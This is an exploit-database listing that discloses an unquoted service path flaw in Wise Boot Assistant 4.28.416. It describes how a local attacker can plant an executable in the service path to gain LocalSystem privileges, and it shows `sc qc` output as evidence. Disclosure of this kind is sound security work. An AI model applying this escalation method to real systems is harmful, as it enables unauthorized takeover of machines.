[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Wise Boot Assistant 4.28.416 Privilege Escalation Vulnerability

Author
Amir.ght
Risk
[
Security Risk High
]
0day-ID
0day-ID-25932
Category
local exploits
Date add
20-10-2016
Platform
windows
#########################################################################
# Exploit Title: Wise Boot Assistant Unquoted Service Path Privilege Escalation
# Date: 19/10/2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage:http://www.wisecleaner.com/
# Software Link:
http://downloads.wisecleaner.com/soft/WiseCare365.exe
# version : 4.28.416 (Latest)
# Tested on: Windows 7
##########################################################################

Wise Boot Assistant installs a service with an unquoted service path
To properly exploit this vulnerability, the local attacker must insert
an executable file in the path of the service.
Upon service restart or system reboot, the malicious code will be run
with elevated privileges.
-------------------------------------------
C:\>sc qc  WiseBootAssistant
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: WiseBootAssistant
        TYPE               : 110  WIN32_OWN_PROCESS (interactive)
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\Wise\Wise Care 365\BootTime.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Wise Boot Assistant
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
#####################################################

#  0day.today [2024-11-15]  #